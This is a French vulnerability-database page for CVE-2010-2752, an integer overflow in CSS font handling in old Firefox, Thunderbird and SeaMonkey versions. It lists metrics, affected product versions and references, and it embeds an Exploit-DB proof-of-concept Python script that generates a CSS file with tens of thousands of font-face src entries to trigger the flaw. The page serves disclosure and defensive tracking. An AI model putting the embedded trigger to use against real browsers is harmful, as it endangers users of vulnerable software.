CVE-2010-2752 : Détail

CVE-2010-2752

75.2%V3
Network
2010-07-30
18h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Integer overflow in an array class in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code by placing many Cascading Style Sheets (CSS) values in an array, related to references to external font resources and an inconsistency between 16-bit and 32-bit integers.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 15104

Date de publication : 2010-09-24 22h00 +00:00
Auteur : Abysssec
EDB Vérifié : Yes

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip) ''' ''' Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability Version : Firefox Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : Crirical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-2752 ''' import sys; myStyle = """ @font-face { font-family: Sean; font-style: normal; font-weight: normal; src: url(SEAN1.eot); src: url('type/filename.woff') format('woff') """ i=0 while(i<50000): myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n"; i=i+1 myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n"; myStyle = myStyle + "}\n"; cssFile = open("style2.css","w") cssFile.write(myStyle) cssFile.close()

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.5.1

Mozilla>>Firefox >> Version 3.5.2

Mozilla>>Firefox >> Version 3.5.3

Mozilla>>Firefox >> Version 3.5.4

Mozilla>>Firefox >> Version 3.5.5

Mozilla>>Firefox >> Version 3.5.6

Mozilla>>Firefox >> Version 3.5.7

Mozilla>>Firefox >> Version 3.5.9

Mozilla>>Firefox >> Version 3.5.10

Mozilla>>Firefox >> Version 3.6.1

    Mozilla>>Firefox >> Version 3.6.2

    Mozilla>>Firefox >> Version 3.6.3

    Mozilla>>Firefox >> Version 3.6.4

    Mozilla>>Firefox >> Version 3.6.6

    Configuraton 0

    Mozilla>>Thunderbird >> Version 3.0

    Mozilla>>Thunderbird >> Version 3.0.1

    Mozilla>>Thunderbird >> Version 3.0.2

    Mozilla>>Thunderbird >> Version 3.0.3

    Mozilla>>Thunderbird >> Version 3.0.4

    Mozilla>>Thunderbird >> Version 3.0.5

    Mozilla>>Thunderbird >> Version 3.1

    Configuraton 0

    Mozilla>>Seamonkey >> Version To (including) 2.0.5

    Mozilla>>Seamonkey >> Version 1.0

    Mozilla>>Seamonkey >> Version 1.0

    Mozilla>>Seamonkey >> Version 1.0

    Mozilla>>Seamonkey >> Version 1.0.1

    Mozilla>>Seamonkey >> Version 1.0.2

    Mozilla>>Seamonkey >> Version 1.0.3

    Mozilla>>Seamonkey >> Version 1.0.4

    Mozilla>>Seamonkey >> Version 1.0.5

    Mozilla>>Seamonkey >> Version 1.0.6

    Mozilla>>Seamonkey >> Version 1.0.7

    Mozilla>>Seamonkey >> Version 1.0.8

    Mozilla>>Seamonkey >> Version 1.0.9

    Mozilla>>Seamonkey >> Version 1.1

    Mozilla>>Seamonkey >> Version 1.1

    Mozilla>>Seamonkey >> Version 1.1

    Mozilla>>Seamonkey >> Version 1.1.1

    Mozilla>>Seamonkey >> Version 1.1.2

    Mozilla>>Seamonkey >> Version 1.1.3

    Mozilla>>Seamonkey >> Version 1.1.4

    Mozilla>>Seamonkey >> Version 1.1.5

    Mozilla>>Seamonkey >> Version 1.1.6

    Mozilla>>Seamonkey >> Version 1.1.7

    Mozilla>>Seamonkey >> Version 1.1.8

    Mozilla>>Seamonkey >> Version 1.1.9

    Mozilla>>Seamonkey >> Version 1.1.10

    Mozilla>>Seamonkey >> Version 1.1.11

    Mozilla>>Seamonkey >> Version 1.1.12

    Mozilla>>Seamonkey >> Version 1.1.13

    Mozilla>>Seamonkey >> Version 1.1.14

    Mozilla>>Seamonkey >> Version 1.1.15

    Mozilla>>Seamonkey >> Version 1.1.16

    Mozilla>>Seamonkey >> Version 1.1.17

    Mozilla>>Seamonkey >> Version 1.1.18

    Mozilla>>Seamonkey >> Version 1.1.19

    Mozilla>>Seamonkey >> Version 1.5.0.8

    Mozilla>>Seamonkey >> Version 1.5.0.9

    Mozilla>>Seamonkey >> Version 1.5.0.10

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0

    Mozilla>>Seamonkey >> Version 2.0.1

    Mozilla>>Seamonkey >> Version 2.0.2

    Mozilla>>Seamonkey >> Version 2.0.3

    Mozilla>>Seamonkey >> Version 2.0.4

    Mozilla>>Seamonkey >> Version 2.0a1pre

      Références

      http://www.securityfocus.com/bid/41852
      Tags : vdb-entry, x_refsource_BID
      http://www.securityfocus.com/archive/1/512514
      Tags : mailing-list, x_refsource_BUGTRAQ